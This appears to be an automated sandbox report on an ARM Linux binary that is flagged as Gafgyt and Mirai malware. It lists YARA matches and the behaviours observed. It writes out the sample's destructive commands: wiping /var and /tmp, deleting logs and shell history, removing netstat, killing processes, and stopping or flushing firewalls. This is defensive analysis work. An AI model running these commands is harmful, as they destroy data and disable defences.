Source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75, id = 6a510422-3662-4fdb-9c03-0101f16e87cd, last_modified = 2021-09-16
Source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc, id = d2953f92-62ee-428d-88c5-723914c88c6e, last_modified = 2021-09-16
Source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75, id = 6a510422-3662-4fdb-9c03-0101f16e87cd, last_modified = 2021-09-16
Source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc, id = d2953f92-62ee-428d-88c5-723914c88c6e, last_modified = 2021-09-16
Source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75, id = 6a510422-3662-4fdb-9c03-0101f16e87cd, last_modified = 2021-09-16
Source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc, id = d2953f92-62ee-428d-88c5-723914c88c6e, last_modified = 2021-09-16
Source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75, id = 6a510422-3662-4fdb-9c03-0101f16e87cd, last_modified = 2021-09-16
Source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc, id = d2953f92-62ee-428d-88c5-723914c88c6e, last_modified = 2021-09-16
Source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5531, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5533, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5535, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5537, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
Source: classification engine Classification label: mal100.spre.troj.evad.linELF@0/1@0/0

Persistence and Installation Behavior
barindex
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 5610) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5610) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/php/.. Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/snapd/assertions/asserts-v0/.. Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/snapd/assertions/.. Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/snapd/.. Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/colord/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Source: /usr/bin/rm (PID: 5553) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/231/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/231/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/233/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/233/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1333/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1333/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1695/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1695/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/911/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/911/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/3874/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/3874/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/914/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/914/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/917/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/917/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/19/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/19/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1591/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1591/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1588/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1588/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/125/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/125/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/4/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/246/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/246/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/126/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/126/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/5/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/5/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/127/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/127/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/6/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/6/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1585/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/1585/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/128/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/128/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/7/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/7/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/129/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/129/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/8/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/8/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/800/status Jump to behavior
Source: /usr/bin/pkill (PID: 5602) File opened: /proc/800/cmdline Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5548) Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5560) Shell command executed: /bin/sh -c "rm -rf /var/log/wtmp" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5563) Shell command executed: /bin/sh -c "rm -rf ~/.bash_history" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5570) Shell command executed: /bin/sh -c "history -c;history -w" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5575) Shell command executed: /bin/sh -c "rm -rf /tmp/*" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5581) Shell command executed: /bin/sh -c "history -c" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5586) Shell command executed: /bin/sh -c "rm -rf /bin/netstat" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5592) Shell command executed: /bin/sh -c "history -w" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5597) Shell command executed: /bin/sh -c "pkill -9 busybox" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5603) Shell command executed: /bin/sh -c "pkill -9 perl" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5606) Shell command executed: /bin/sh -c "service iptables stop" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5622) Shell command executed: /bin/sh -c "/sbin/iptables -F;/sbin/iptables -X" Jump to behavior
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5630) Shell command executed: /bin/sh -c "service firewalld stop" Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5624) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5629) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /bin/sh (PID: 5602) Pkill executable: /usr/bin/pkill -> pkill -9 busybox Jump to behavior
Source: /bin/sh (PID: 5605) Pkill executable: /usr/bin/pkill -> pkill -9 perl Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 5553) Rm executable: /usr/bin/rm -> rm -rf /tmp/config-err-8GMGF7 /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/qkdjdjj888.arm7.elf /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-oCVxfzsbTQaT /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-gKnN3f /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-ttuwai /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-5zAd2i /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-2Gilej /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-Nw8Bch /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-b6o3kh /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-kBQCFf /tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-70vK5e /tmp/vmware-root_724-2965906890 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-ModemManager.service-8RZKbg /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-colord.service-i36c6f /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-fwupd.service-Bzpwlj /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-switcheroo-control.service-HC2Noh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-logind.service-IgPdPh /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-resolved.service-VqRX8h /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-systemd-timedated.service-a8UKGf /var/tmp/systemd-private-d76496b72bf2487abe78ff63f093d446-upower.service-aLITRg Jump to behavior
Source: /bin/sh (PID: 5562) Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp Jump to behavior
Source: /bin/sh (PID: 5569) Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history Jump to behavior
Source: /bin/sh (PID: 5580) Rm executable: /usr/bin/rm -> rm -rf /tmp/* Jump to behavior
Source: /bin/sh (PID: 5591) Rm executable: /usr/bin/rm -> rm -rf /bin/netstat Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/service (PID: 5610) Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5615) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 5617) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Source: /usr/sbin/service (PID: 5632) Systemctl executable: /usr/bin/systemctl -> systemctl stop firewalld.service Jump to behavior
Source: /usr/sbin/service (PID: 5635) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 5637) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Source: /usr/sbin/service (PID: 5618) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: /usr/sbin/service (PID: 5638) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: submitted sample Stderr: /bin/sh: 1: history: not found/bin/sh: 1: history: not found/bin/sh: 1: history: not found/bin/sh: 1: history: not foundFailed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewalld.service: Unit firewalld.service not loaded.: exit code = 0

Hooking and other Techniques for Hiding and Protection
barindex
Sample deletes itself
Source: /usr/bin/rm (PID: 5553) File: /tmp/qkdjdjj888.arm7.elf Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5602) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5605) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5531) Queries kernel information via 'uname': Jump to behavior
Source: qkdjdjj888.arm7.elf, 5531.1.00007ffe66576000.00007ffe66597000.rw-.sdmp, qkdjdjj888.arm7.elf, 5533.1.00007ffe66576000.00007ffe66597000.rw-.sdmp, qkdjdjj888.arm7.elf, 5535.1.00007ffe66576000.00007ffe66597000.rw-.sdmp, qkdjdjj888.arm7.elf, 5537.1.00007ffe66576000.00007ffe66597000.rw-.sdmp Binary or memory string: >x86_64/usr/bin/qemu-arm/tmp/qkdjdjj888.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/qkdjdjj888.arm7.elf
Source: qkdjdjj888.arm7.elf, 5531.1.0000557604df6000.0000557604f45000.rw-.sdmp, qkdjdjj888.arm7.elf, 5533.1.0000557604df6000.0000557604f24000.rw-.sdmp, qkdjdjj888.arm7.elf, 5535.1.0000557604df6000.0000557604f24000.rw-.sdmp, qkdjdjj888.arm7.elf, 5537.1.0000557604df6000.0000557604f24000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: qkdjdjj888.arm7.elf, 5531.1.0000557604df6000.0000557604f45000.rw-.sdmp, qkdjdjj888.arm7.elf, 5533.1.0000557604df6000.0000557604f24000.rw-.sdmp, qkdjdjj888.arm7.elf, 5535.1.0000557604df6000.0000557604f24000.rw-.sdmp, qkdjdjj888.arm7.elf, 5537.1.0000557604df6000.0000557604f24000.rw-.sdmp Binary or memory string: vU!/etc/qemu-binfmt/arm
Source: qkdjdjj888.arm7.elf, 5531.1.00007ffe66576000.00007ffe66597000.rw-.sdmp, qkdjdjj888.arm7.elf, 5533.1.00007ffe66576000.00007ffe66597000.rw-.sdmp, qkdjdjj888.arm7.elf, 5535.1.00007ffe66576000.00007ffe66597000.rw-.sdmp, qkdjdjj888.arm7.elf, 5537.1.00007ffe66576000.00007ffe66597000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information
barindex
Yara detected Gafgyt
Source: Yara match File source: qkdjdjj888.arm7.elf, type: SAMPLE
Yara detected Mirai
Source: Yara match File source: qkdjdjj888.arm7.elf, type: SAMPLE
Source: Yara match File source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5531, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5533, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5535, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5537, type: MEMORYSTR
Sample contains strings that are user agent strings indicative of HTTP manipulation
Source: Initial sample User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Source: Initial sample User agent string found: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
